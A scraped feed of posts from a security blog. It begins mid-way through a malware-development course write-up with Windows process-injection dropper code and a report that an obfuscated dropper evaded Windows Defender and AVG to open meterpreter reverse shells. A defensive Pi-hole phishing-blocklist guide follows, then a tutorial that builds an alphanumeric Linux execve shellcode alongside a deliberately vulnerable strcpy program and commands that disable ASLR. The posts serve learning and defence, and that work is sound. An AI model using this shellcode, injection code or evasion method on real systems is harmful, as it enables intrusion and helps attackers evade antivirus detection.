<span class="n">hProc</span> <span class="o">=</span> <span class="n">OpenProcess</span><span class="p">(</span> <span class="n">PROCESS_CREATE_THREAD</span> <span class="o">|</span> <span class="n">PROCESS_QUERY_INFORMATION</span> <span class="o">|</span>
<span class="n">PROCESS_VM_OPERATION</span> <span class="o">|</span> <span class="n">PROCESS_VM_READ</span> <span class="o">|</span> <span class="n">PROCESS_VM_WRITE</span><span class="p">,</span>
<span class="n">FALSE</span><span class="p">,</span> <span class="p">(</span><span class="n">DWORD</span><span class="p">)</span> <span class="n">pid</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">hProc</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
<span class="n">Inject</span><span class="p">(</span><span class="n">hProc</span><span class="p">,</span> <span class="n">exec_mem</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">hProc</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<h2 id="tests">Tests</h2>
<p>The course teaches to bypass Windows Defender but i want to go further and also test the dropper aginst AVG Free Antivirus.<br />
Of course the “plaintext” version of this script works but it’s detected from Windows Defender and AVG Free AV agents, but what appens if we obfuscates all the strings and functions as reenz0h suggested in the assignment?
I tested the obfuscated version of the script on different process: <code class="language-plaintext highlighter-rouge">explorer.exe</code>, <code class="language-plaintext highlighter-rouge">notepad.exe</code> and <code class="language-plaintext highlighter-rouge">smartscreen.exe</code>.
Well i can tell you that Windows Defender didn’t detected the dropper at all also when we try to inject the payload in the <code class="language-plaintext highlighter-rouge">explorer.exe</code> process.
Different story for AVG Free that seems monitorizes the <code class="language-plaintext highlighter-rouge">explorer.exe</code> process, detecting the dropper as a malicious file and moving it in the quarantine zone but only after executing the payload, so in this case you can obtain a meterpreter session but the attack is reported. No worries because instead nothing appens when we try to inject the <code class="language-plaintext highlighter-rouge">notepad.exe</code>, AVG scan the dropper and let it execute the meterpreter payload allowing it to popping a reverse shell on our MSF console, same story if we try to inject the <code class="language-plaintext highlighter-rouge">smartscreen.exe</code> process, another meterpreter session is opened without any alarm from AVG.
So following the TOON rule (Two is One and One is None) learned in the course, here you can see the two injection processes at works.</p>
<p><a href="/assets/images/AV_evasion/AVG_bypass.webm"><img src="/assets/images/AV_evasion/AVG_bypass.gif" alt="" /></a><br /></p>
<p>and <a href="https://github.com/bolonobolo/av_evasion/blob/master/PE_Injection/AES%20encrypted%20Dropper/implant.cpp">here</a> you can find the obfuscated dropper code. <br />
In the <a href="https://blackcloud.me/the-payload-is-behind-kitties/">next post</a> we’ll try to complete another point of the assignment <code class="language-plaintext highlighter-rouge">hide the encrypted payload behind an image</code>.</p>
<h2 id="references">References</h2>
<p>Malware Dev Essentials Course</p>
<ul>
<li><a href="https://institute.sektor7.net/red-team-operator-malware-development-essentials">Sektor7</a></li>
<li><a href="https://twitter.com/Sektor7Net">reenz0h</a> <br />
<br />
Credits for the injection gifs and the smartscreen.exe suggestion goes to <a href="https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process">this blog post of elasti.co site</a></li>
</ul>{"name"=>nil, "avatar"=>"/assets/images/blackcloud3.png", "bio"=>"Made to broke things", "location"=>"noplace", "email"=>nil, "links"=>[{"label"=>"Email", "icon"=>"fas fa-fw fa-envelope-square", "url"=>"mailto:bolo@autistici.org"}, {"label"=>"Website", "icon"=>"fas fa-fw fa-link"}, {"label"=>"Twitter", "icon"=>"fab fa-fw fa-twitter-square", "url"=>"https://twitter.com/bolonobolo"}, {"label"=>"Facebook", "icon"=>"fab fa-fw fa-facebook-square"}, {"label"=>"GitHub", "icon"=>"fab fa-fw fa-github", "url"=>"https://github.com/bolonobolo"}, {"label"=>"Instagram", "icon"=>"fab fa-fw fa-instagram"}, {"label"=>"Hackthebox", "url"=>"https://www.hackthebox.eu/profile/8822", "icon"=>"fas fa-fw fa-link"}]}Using Pihole to fight phishing2020-03-20T00:00:00+00:002020-03-20T00:00:00+00:00https://blackcloud.me/fight-phishing<p><img src="/assets/images/Various/phish.jpg" alt="" /><br /></p>
<h2 id="introduction">Introduction</h2>
<p>Due to recent events about COVID-19 some Health Centers in Europe are victims of ramsonware attacks. The first channel to spread ransomware is phishing so here are some suggestion to block surfing to phishing sites if you have clicked on the phishing link in the email.
I installed some time ago the Pihole Ad Blocking on my Raspberry Pi, to avoid the annoiyng commercials AD when surfing the net from home. But the Pihole can have more powerful applications such as adding other types of blacklist to the Pihole - and phishing site black list could be one of them.</p>
<h2 id="the-chain">The chain</h2>
<p>The chain to follow to transform your Pihole in a DNS that blocks phishing links is preatty easy:</p>
<ol>
<li>download and install the Pihole; there are many guides in Internet, depending on where you want to install it <a href="https://blog.cryptoaustralia.org.au/instructions-for-setting-up-pi-hole/">here’s one for Raspberry</a></li>
<li>add the phishing list to the <code class="language-plaintext highlighter-rouge">adlist.list</code> of your Pihole istallation</li>
<li>update your Gravity list</li>
<li>report and vote for phishing sites</li>
<li>check that pihole blocks DNS queries</li>
</ol>
<p>As said, the first step is pretty simple - yet it’s offtopic here (ping me if you are in trouble with the installation), so I’ll discuss directly the second point.</p>
<h3 id="add-phishing-list">Add phishing list</h3>
<p>I recently found a very good project that updates a phishing blacklist every 6 hours. This list could be implemented in the Pihole to block phishing sites.
It is called <a href="https://phishing.army/">Phishing Army</a> and it updates its lists directly from 3 sources:</p>
<ul>
<li><a href="https://www.phishtank.com/">Phishtank</a></li>
<li><a href="https://openphish.com/">Openphis</a></li>
<li><a href="https://github.com/mitchellkrogza/Phishing.Database">PhishFindR</a></li>
</ul>
<h3 id="add-phishing-army-blacklist-to-your-pihole">Add Phishing Army blacklist to your Pihole</h3>
<p>To add the Phishing Army black list to your Pihole simply add the list to the list file in the path <code class="language-plaintext highlighter-rouge">/etc/pihole/adlist.list</code> file in your Pihole installation.
Just connect to the Pihole via ssh and type this command</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># vim /etc/pihole/adlists.list</span>
</code></pre></div></div>
<p>paste the link at the bottom of your list file, write and quit.</p>
<p><img src="/assets/images/Various/pihole_adlists.png" alt="" /><br /></p>
<h3 id="update-your-gravity-list">Update your Gravity list</h3>
<p>Now you have to update the Gravity black list by typing the command</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># pihole -g</span>
</code></pre></div></div>
<p><img src="/assets/images/Various/pihole_adlists_update.png" alt="" /><br /></p>
<h3 id="report-and-vote-for-phishing-sites">Report and vote for phishing sites</h3>
<p>The first thing to do is to report and vote for phishing sites, the easy way is to follow the instruction written on the amazing blog of the <a href="https://cyberv19.org.uk/2020/03/20/helping-the-fight-against-phishing/">CyberV19 volunteers</a> about voting system on Phishtank.
When the link reaches a good number of votes it is marked as phishing, then it will be put in the blacklist update of Phishing Army and automatically inside your Pihole.</p>
<h3 id="checks">Checks</h3>
<p>Now you can check if your Pihole is blocking malicious DNS requests.
Search for a full or partial link in the Query Lists Search of the Pihole</p>
<p><img src="/assets/images/Various/pihole_adlists_request.png" alt="" /><br />
<img src="/assets/images/Various/pihole_adlists_request2.png" alt="" /><br /></p>
<p>Try to surf one of the links in the results and see the DNS query blocked by the Pihole.</p>
<p><img src="/assets/images/Various/pihole_adlists_request3.png" alt="" /><br />
<img src="/assets/images/Various/pihole_adlists_request4.png" alt="" /><br /></p>
<p>Well done!</p>
<h3 id="conclusions">Conclusions</h3>
<p>This is a home setup scenario. For a small company or test enterprise solutions, we would suggest installing Pi-hole in a docker container and configuring the Domain Controller to point to the Pi-hole as your primary DNS.<br />
To reiterate, we recommend this setup for HOME use only. Hospitals and healthcare providers should use business class solutions for DNS services and protective DNS.</p>{"name"=>nil, "avatar"=>"/assets/images/blackcloud3.png", "bio"=>"Made to broke things", "location"=>"noplace", "email"=>nil, "links"=>[{"label"=>"Email", "icon"=>"fas fa-fw fa-envelope-square", "url"=>"mailto:bolo@autistici.org"}, {"label"=>"Website", "icon"=>"fas fa-fw fa-link"}, {"label"=>"Twitter", "icon"=>"fab fa-fw fa-twitter-square", "url"=>"https://twitter.com/bolonobolo"}, {"label"=>"Facebook", "icon"=>"fab fa-fw fa-facebook-square"}, {"label"=>"GitHub", "icon"=>"fab fa-fw fa-github", "url"=>"https://github.com/bolonobolo"}, {"label"=>"Instagram", "icon"=>"fab fa-fw fa-instagram"}, {"label"=>"Hackthebox", "url"=>"https://www.hackthebox.eu/profile/8822", "icon"=>"fas fa-fw fa-link"}]}Linux Shellcode - Alphanumeric Execve()2019-12-30T00:00:00+00:002019-12-30T00:00:00+00:00https://blackcloud.me/Linux-shellcode-alphanumeric<p><img src="/assets/images/shell.png" alt="" /><br /></p>
<h2 id="intruduction">Intruduction</h2>
<p>Back to shellcode argument, today we will speak about alphanumeric shellcode. This argument was suggested to me from @nahualito (ty!), some weeks ago and i have to admit it took me crazy sometimes but it was also a lot fun. The scope of the task is to create a shellcode completely of alphanumeric characters. The reason of this madness is because</p>
<blockquote>
<p>there are several filtering schemes out there being employed by programs that only allow alphanumeric characters to be passed into their buffer<br /></p>
</blockquote>
<p>an also</p>
<blockquote>
<p>(Alphanumeric) shellcodes bypasses many character filters and is somewhat easy to learn due to the fact that many ascii instructions are only one or two byte instructions. The smaller the instructions, the more easily obfuscated and randomized they are. During many buffer overflows the buffer is limited to a very small writeable segment of memory, so many times it is important to utilize the smallest possible combination of opcodes. In other cases, more buffer space is available and things like ascii art shellcode are more plausible.<br /></p>
</blockquote>
<p>So we can resume the “Art” of create Alphanumeric Shellcode like an extreme polymorphism that allow us to bypass IDS/IPS/AV agents and this is, at the end, our scope.</p>
<h2 id="allowed-instructions">Allowed instructions</h2>
<p>The term “alphanumeric” speaks itself, we want to build a shellcode but only with instructions that has opcode fallen in the alphanumeric character range and they can be resumed in this table</p>
<table>
<thead>
<tr>
<th>hexadecimal opcode</th>
<th>char</th>
<th>instruction</th>
</tr>
</thead>
<tbody>
<tr>
<td>30 </r></td>
<td>‘0’</td>
<td>xor <r/m8>,<r8></r8></td>
</tr>
<tr>
<td>31 </r></td>
<td>‘1’</td>
<td>xor <r/m32>,<r32></r32></td>
</tr>
<tr>
<td>32 </r></td>
<td>‘2’</td>
<td>xor <r8>,<r/m8></r8></td>
</tr>
<tr>
<td>33 </r></td>
<td>‘3’</td>
<td>xor <r32>,<r/m32></r32></td>
</tr>
<tr>
<td>34 <imm8></imm8></td>
<td>‘4’</td>
<td>xor al,<imm8></imm8></td>
</tr>
<tr>
<td>35 <imm32></imm32></td>
<td>‘5’</td>
<td>xor eax,<imm32></imm32></td>
</tr>
<tr>
<td>36</td>
<td>‘6’</td>
<td>ss: (Segment Override Prefix)</td>
</tr>
<tr>
<td>37</td>
<td>‘7’</td>
<td>aaa</td>
</tr>
<tr>
<td>38 </r></td>
<td>‘8’</td>
<td>cmp <r/m8>,<r8></r8></td>
</tr>
<tr>
<td>39 </r></td>
<td>‘9’</td>
<td>cmp <r/m32>,<r32></r32></td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td>41</td>
<td>‘A’</td>
<td>inc ecx</td>
</tr>
<tr>
<td>42</td>
<td>‘B’</td>
<td>inc edx</td>
</tr>
<tr>
<td>43</td>
<td>‘C’</td>
<td>inc ebx</td>
</tr>
<tr>
<td>44</td>
<td>‘D’</td>
<td>inc esp</td>
</tr>
<tr>
<td>45</td>
<td>‘E’</td>
<td>inc ebp</td>
</tr>
<tr>
<td>46</td>
<td>‘F’</td>
<td>inc esi</td>
</tr>
<tr>
<td>47</td>
<td>‘G’</td>
<td>inc edi</td>
</tr>
<tr>
<td>48</td>
<td>‘H’</td>
<td>dec eax</td>
</tr>
<tr>
<td>49</td>
<td>‘I’</td>
<td>dec ecx</td>
</tr>
<tr>
<td>4A</td>
<td>‘J’</td>
<td>dec edx</td>
</tr>
<tr>
<td>4B</td>
<td>‘K’</td>
<td>dec ebx</td>
</tr>
<tr>
<td>4C</td>
<td>‘L’</td>
<td>dec esp</td>
</tr>
<tr>
<td>4D</td>
<td>‘M’</td>
<td>dec ebp</td>
</tr>
<tr>
<td>4E</td>
<td>‘N’</td>
<td>dec esi</td>
</tr>
<tr>
<td>4F</td>
<td>‘O’</td>
<td>dec edi</td>
</tr>
<tr>
<td>50</td>
<td>‘P’</td>
<td>push eax</td>
</tr>
<tr>
<td>51</td>
<td>‘Q’</td>
<td>push ecx</td>
</tr>
<tr>
<td>52</td>
<td>‘R’</td>
<td>push edx</td>
</tr>
<tr>
<td>53</td>
<td>‘S’</td>
<td>push ebx</td>
</tr>
<tr>
<td>54</td>
<td>‘T’</td>
<td>push esp</td>
</tr>
<tr>
<td>55</td>
<td>‘U’</td>
<td>push ebp</td>
</tr>
<tr>
<td>56</td>
<td>‘V’</td>
<td>push esi</td>
</tr>
<tr>
<td>57</td>
<td>‘W’</td>
<td>push edi</td>
</tr>
<tr>
<td>58</td>
<td>‘X’</td>
<td>pop eax</td>
</tr>
<tr>
<td>59</td>
<td>‘Y’</td>
<td>pop ecx</td>
</tr>
<tr>
<td>5A</td>
<td>‘Z’</td>
<td>pop edx</td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td>61</td>
<td>‘a’</td>
<td>popa</td>
</tr>
<tr>
<td>62 <…></td>
<td>‘b’</td>
<td>bound <…></td>
</tr>
<tr>
<td>63 <…></td>
<td>‘c’</td>
<td>arpl <…></td>
</tr>
<tr>
<td>64</td>
<td>‘d’</td>
<td>fs: (Segment Override Prefix)</td>
</tr>
<tr>
<td>65</td>
<td>‘e’</td>
<td>gs: (Segment Override Prefix)</td>
</tr>
<tr>
<td>66</td>
<td>‘f’</td>
<td>o16: (Operand Size Override)</td>
</tr>
<tr>
<td>67</td>
<td>‘g’</td>
<td>a16: (Address Size Override)</td>
</tr>
<tr>
<td>68 <imm32></imm32></td>
<td>‘h’</td>
<td>push <imm32></imm32></td>
</tr>
<tr>
<td>69 <…></td>
<td>‘i’</td>
<td>imul <…></td>
</tr>
<tr>
<td>6A <imm8></imm8></td>
<td>‘j’</td>
<td>push <imm8></imm8></td>
</tr>
<tr>
<td>6B <…></td>
<td>‘k’</td>
<td>imul <…></td>
</tr>
<tr>
<td>6C <…></td>
<td>‘l’</td>
<td>insb <…></td>
</tr>
<tr>
<td>6D <…></td>
<td>‘m’</td>
<td>insd <…></td>
</tr>
<tr>
<td>6E <…></td>
<td>‘n’</td>
<td>outsb <…></td>
</tr>
<tr>
<td>6F <…></td>
<td>‘o’</td>
<td>outsd <…></td>
</tr>
<tr>
<td>70 <disp8></disp8></td>
<td>‘p’</td>
<td>jo <disp8></disp8></td>
</tr>
<tr>
<td>71 <disp8></disp8></td>
<td>‘q’</td>
<td>jno <disp8></disp8></td>
</tr>
<tr>
<td>72 <disp8></disp8></td>
<td>‘r’</td>
<td>jb <disp8></disp8></td>
</tr>
<tr>
<td>73 <disp8></disp8></td>
<td>’s’</td>
<td>jae <disp8></disp8></td>
</tr>
<tr>
<td>74 <disp8></disp8></td>
<td>‘t’</td>
<td>je <disp8></disp8></td>
</tr>
<tr>
<td>75 <disp8></disp8></td>
<td>‘u’</td>
<td>jne <disp8></disp8></td>
</tr>
<tr>
<td>76 <disp8></disp8></td>
<td>‘v’</td>
<td>jbe <disp8></disp8></td>
</tr>
<tr>
<td>77 <disp8></disp8></td>
<td>‘w’</td>
<td>ja <disp8></disp8></td>
</tr>
<tr>
<td>78 <disp8></disp8></td>
<td>‘x’</td>
<td>js <disp8></disp8></td>
</tr>
<tr>
<td>79 <disp8></disp8></td>
<td>‘y’</td>
<td>jns <disp8></disp8></td>
</tr>
<tr>
<td>7A <disp8></disp8></td>
<td>‘z’</td>
<td>jp <disp8></disp8></td>
</tr>
</tbody>
</table>
<p>What can we directly deduct of all this?</p>
<ul>
<li>no “mov” instructions: we need to find another way to manipulate our data.</li>
<li>no interesting arithmetic instructions (“add”,”sub”,…): we can only use DEC and INC and we can’t use INC with the EAX register.</li>
<li>the “xor” instruction: we can use XOR with bytes and doublewords very interesting for basic crypto stuff.</li>
<li>“PUSH”/”POP”/”POPAD” INSTRUCTIONS: we can push bytes and doublewords directly on the stack and we can only use POP with the EAX,ECX and EDX registers, it seems we’re going to play again with the stack.</li>
<li>the “o16” operand size override: we can also achieve 16 bits manipulations with this instruction prefix.</li>
<li>“jmp” and “cmp” instructions: we can realize some comparisons but we can’t directly use constant values with CMP.</li>
</ul>
<p>Not so much eh?! Ah and obviously don’t forget that operands of these instructions (/r, imm8, imm32, disp8 and disp32) must also remain alphanumeric. It may make our task once again more complicated…<br /></p>
<h2 id="first-alphanumeric-instructions">First alphanumeric instructions</h2>
<p>No panic, we can obtain a shellcode with a little of creativity. The simple idea behind is to store all that we need on the stack and lastly use the POPAD instruction to load the right things in the right places<br />
For the lord of simplicity of our shellcode we’ll take the simpliest Linux shellcode to manipulate, the <code class="language-plaintext highlighter-rouge">execve()</code> shellcode.<br />
Our <a href="https://blackcloud.me/SLAE32-6/">shellcode</a> should work for this purpose:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">cdq</span> <span class="c1">; xor edx</span>
<span class="nf">mul</span> <span class="nb">edx</span> <span class="c1">; xor eax</span>
<span class="nf">lea</span> <span class="nb">ecx</span><span class="p">,</span> <span class="p">[</span><span class="nb">eax</span><span class="p">]</span> <span class="c1">; xor ecx</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="mh">0x68732f2f</span>
<span class="nf">mov</span> <span class="nb">edi</span><span class="p">,</span> <span class="mh">0x6e69622f</span>
<span class="nf">push</span> <span class="nb">ecx</span> <span class="c1">; push NULL in stack</span>
<span class="nf">push</span> <span class="nb">esi</span> <span class="c1">; push hs/ in stack</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; push nib// in stack</span>
<span class="nf">lea</span> <span class="nb">ebx</span><span class="p">,</span> <span class="p">[</span><span class="nb">esp</span><span class="p">]</span> <span class="c1">; load stack pointer to ebx</span>
<span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xb</span> <span class="c1">; load execve in eax</span>
<span class="nf">int</span> <span class="mh">0x80</span>
</code></pre></div></div>
<p>The first 3 instructions serves us to put 0 on our registers but as saw we can’t directly use this instruction, but we can use a polymorphism to do the same work with PUSh, POP and XOR, using the stack</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">push</span> <span class="mh">0x30</span> <span class="c1">; push 0x30 on the stack</span>
<span class="nf">pop</span> <span class="nb">eax</span> <span class="c1">; place 0x30 in EAX</span>
<span class="nf">xor</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x30</span> <span class="c1">; xor EAX with 0x30 to obtain 0</span>
<span class="nf">push</span> <span class="nb">eax</span> <span class="c1">; put 0 on the stack</span>
<span class="nf">push</span> <span class="nb">edx</span> <span class="c1">; put 0 </span>
</code></pre></div></div>
<p>Nice, now we have to put on the stack the /bin//sh string that will be loaded in EBX register, for this purpose we need to use a XOR starting from 4 letters like XXsh and trasform it in //sh.<br />
A review on XOR logic is usefull here:</p>
<ul>
<li>1 XOR 1 = 0</li>
<li>0 XOR 0 = 0</li>
<li>1 XOR 0 = 1</li>
</ul>
<p>so making some binary calculations we can find that XXsh in binary is <code class="language-plaintext highlighter-rouge">01011000 01011000 01110011 01101000</code> and we need //sh that is <code class="language-plaintext highlighter-rouge">00101111 00101111 01110011 01101000</code>, what we need is the char to XOR with XXsh to obtain //sh</p>
<pre><code class="language-bin"> X X s h
01011000 01011000 01110011 01101000
xor
01110111 01110111 01110011 01101000 <------
-----------------------------------
00101111 00101111 01110011 01101000
/ / s h
</code></pre>
<p>The result is <code class="language-plaintext highlighter-rouge">01110111 01110111</code> or the equivalent hex <code class="language-plaintext highlighter-rouge">77 77</code> or the equivalent chars ww, so we now prepare the asm code to</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">push</span> <span class="mh">0x68735858</span> <span class="c1">; push XXsh</span>
<span class="nf">pop</span> <span class="nb">eax</span> <span class="c1">; put XXsh on EAX</span>
<span class="nf">xor</span> <span class="nb">ax</span><span class="p">,</span> <span class="mh">0x7777</span> <span class="c1">; xor with ww</span>
<span class="nf">push</span> <span class="nb">eax</span> <span class="c1">; put //sh on the stack</span>
<span class="nf">push</span> <span class="mh">0x30</span> <span class="c1">;</span>
<span class="nf">pop</span> <span class="nb">eax</span> <span class="c1">; xor the eax to 0</span>
<span class="nf">xor</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x30</span> <span class="c1">;</span>
</code></pre></div></div>
<p>Now we can do a more simple job with /bin, using 0bin in EAX, decremting it by 1 and putting it on the stack after //sh</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">xor</span> <span class="nb">eax</span><span class="p">,</span> <span class="mh">0x6e696230</span> <span class="c1">; push 0bin</span>
<span class="nf">dec</span> <span class="nb">eax</span>
<span class="nf">push</span> <span class="nb">eax</span>
</code></pre></div></div>
<p>Now we have the basic elements for the execve, it’s time to load everything in the registers using PUSHAD/POPAD. PUSHAD isn’t in the table but POPAD is, so what we need to do is to emulate a PUSHAD and then call a POPAD. PUSHAD is an instruction that load registers on the stack in this order: EAX, ECX, EDX, EBX, ESP, EBP, ESI, and EDI
Our PUSHAD is a little bit different: EDX, ECX, EBX, EAX, ESP, EBP, ESI, EDI. In this manner when we call POPAD we will put all the things in the right places.</p>
<table>
<thead>
<tr>
<th>PUSHAD instruction</th>
<th>Personalized PUSHAD instruction</th>
</tr>
</thead>
<tbody>
<tr>
<td>PUSH EAX</td>
<td>PUSH EDX (0x0)</td>
</tr>
<tr>
<td>PUSH ECX</td>
<td>PUSH ECX</td>
</tr>
<tr>
<td>PUSH EDX</td>
<td>PUSH EBX</td>
</tr>
<tr>
<td>PUSH EBX</td>
<td>PUSH EAX (%esp)</td>
</tr>
<tr>
<td>PUSH ESP</td>
<td>PUSH ESP</td>
</tr>
<tr>
<td>PUSH EBP</td>
<td>PUSH EBP</td>
</tr>
<tr>
<td>PUSH ESI</td>
<td>PUSH ESI</td>
</tr>
<tr>
<td>PUSH EDI</td>
<td>PUSH EDI</td>
</tr>
</tbody>
</table>
<p>So let’s prepare the code:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">; pushad/popad to place /bin/sh in EBX register</span>
<span class="nf">push</span> <span class="nb">esp</span>
<span class="nf">pop</span> <span class="nb">eax</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">push</span> <span class="nb">ecx</span>
<span class="nf">push</span> <span class="nb">ebx</span>
<span class="nf">push</span> <span class="nb">eax</span>
<span class="nf">push</span> <span class="nb">esp</span>
<span class="nf">push</span> <span class="nb">ebp</span>
<span class="nf">push</span> <span class="nb">esi</span>
<span class="nf">push</span> <span class="nb">edi</span>
<span class="nf">popad</span>
<span class="nf">push</span> <span class="nb">eax</span>
<span class="nf">pop</span> <span class="nb">ecx</span>
<span class="nf">push</span> <span class="nb">ebx</span>
</code></pre></div></div>
<p>The other things we need is the <code class="language-plaintext highlighter-rouge">0xb</code> value in the EAX register, for that purpose we can find a value or more to xor with 0 to obtain 0xb. Doing the same work as for XXsh we can find that <code class="language-plaintext highlighter-rouge">0x4a</code> and after <code class="language-plaintext highlighter-rouge">0x41</code> can help us</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">xor</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x4a</span>
<span class="nf">xor</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x41</span>
</code></pre></div></div>
<p>Now remain the last and the most tedious thing. The <code class="language-plaintext highlighter-rouge">int 0x80</code> syscall that trig our shellcode. We can’t use the int instruction so we need to invent another trick.
The <code class="language-plaintext highlighter-rouge">int 0x80</code> has the opcode <code class="language-plaintext highlighter-rouge">0xcd 0x80</code> so we can save the opcode in the stack and jump in that place to trig the syscall. To do that we can use some binary maths and another technique:</p>
<ul>
<li>starting from EAX xored to 0</li>
<li>decrement EAX by 1 to obtain 0xffffffff</li>
<li>xor AX with 0x4f73</li>
<li>xor AX with 0x3041</li>
<li>obtain 0xffff80cd</li>
<li>push EAX on the stack</li>
</ul>
<pre><code class="language-bin">11111111 11111111 - Begin
01000001 00110000 – XOR #1
10111110 11001111 – Result of XOR #1
01110011 01001111 – XOR #2
11001101 10000000 - Result of XOR #2 ($0xcd & $0x80)
</code></pre>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">dec</span> <span class="nb">eax</span> <span class="c1">; 0xffffffff in EAX</span>
<span class="nf">xor</span> <span class="nb">ax</span><span class="p">,</span> <span class="mh">0x4f73</span> <span class="c1">;</span>
<span class="nf">xor</span> <span class="nb">ax</span><span class="p">,</span> <span class="mh">0x3041</span> <span class="c1">; 0xffff80cd in EAX</span>
<span class="nf">push</span> <span class="nb">eax</span> <span class="c1">; put it on the stack</span>
</code></pre></div></div>
<p>The last problem to solve is that 0xffff80cd must be called as last instruction so living in little endian we need to push the value as first thing. We can summerize the execution with this schema</p>
<p><img src="/assets/images/linux/x86/alphanumeric_0.png" alt="" /><br /></p>
<h2 id="the-shellcode">The Shellcode</h2>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">global</span> <span class="nv">_start</span>
<span class="nf">section</span> <span class="nv">.text</span>
<span class="nl">_start:</span>
<span class="c1">; int 0x80 ------------</span>
<span class="nf">push</span> <span class="mh">0x30</span>
<span class="nf">pop</span> <span class="nb">eax</span>
<span class="nf">xor</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x30</span>
<span class="nf">push</span> <span class="nb">eax</span>
<span class="nf">pop</span> <span class="nb">edx</span>
<span class="nf">dec</span> <span class="nb">eax</span>
<span class="nf">xor</span> <span class="nb">ax</span><span class="p">,</span> <span class="mh">0x4f73</span>
<span class="nf">xor</span> <span class="nb">ax</span><span class="p">,</span> <span class="mh">0x3041</span>
<span class="nf">push</span> <span class="nb">eax</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">pop</span> <span class="nb">eax</span>
<span class="c1">;----------------------</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">push</span> <span class="mh">0x68735858</span>
<span class="nf">pop</span> <span class="nb">eax</span>
<span class="nf">xor</span> <span class="nb">ax</span><span class="p">,</span> <span class="mh">0x7777</span>
<span class="nf">push</span> <span class="nb">eax</span>
<span class="nf">push</span> <span class="mh">0x30</span>
<span class="nf">pop</span> <span class="nb">eax</span>
<span class="nf">xor</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x30</span>
<span class="nf">xor</span> <span class="nb">eax</span><span class="p">,</span> <span class="mh">0x6e696230</span>
<span class="nf">dec</span> <span class="nb">eax</span>
<span class="nf">push</span> <span class="nb">eax</span>
<span class="c1">; pushad/popad to place /bin/sh in EBX register</span>
<span class="nf">push</span> <span class="nb">esp</span>
<span class="nf">pop</span> <span class="nb">eax</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">push</span> <span class="nb">ecx</span>
<span class="nf">push</span> <span class="nb">ebx</span>
<span class="nf">push</span> <span class="nb">eax</span>
<span class="nf">push</span> <span class="nb">esp</span>
<span class="nf">push</span> <span class="nb">ebp</span>
<span class="nf">push</span> <span class="nb">esi</span>
<span class="nf">push</span> <span class="nb">edi</span>
<span class="nf">popad</span>
<span class="nf">push</span> <span class="nb">eax</span>
<span class="nf">pop</span> <span class="nb">ecx</span>
<span class="nf">push</span> <span class="nb">ebx</span>
<span class="nf">xor</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x4a</span>
<span class="nf">xor</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x41</span>
</code></pre></div></div>
<p>For comodity we can transfer the shellcode from nasm to ASCII text:</p>
<pre><code class="language-ascii">j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A
</code></pre>
<p>Now we need a simple buffer overflow that permit us to load and execute the shellcode. Let’s use a simple C program (bof.c)</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdlib.h>
#include <stdio.h>
#include <string.h>
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[]){</span>
<span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span>
<span class="n">strcpy</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>When you test it on new kernels remember to disable the randomize_va_space and to compile the C program with execstack enabled and the stack protector disabled</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash <span class="nt">-c</span> <span class="s1">'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'</span>
sysctl <span class="nt">-p</span>
gcc <span class="nt">-z</span> execstack <span class="nt">-fno-stack-protector</span> <span class="nt">-mpreferred-stack-boundary</span><span class="o">=</span>2 <span class="nt">-g</span> bof.c <span class="nt">-o</span> bof
</code></pre></div></div>
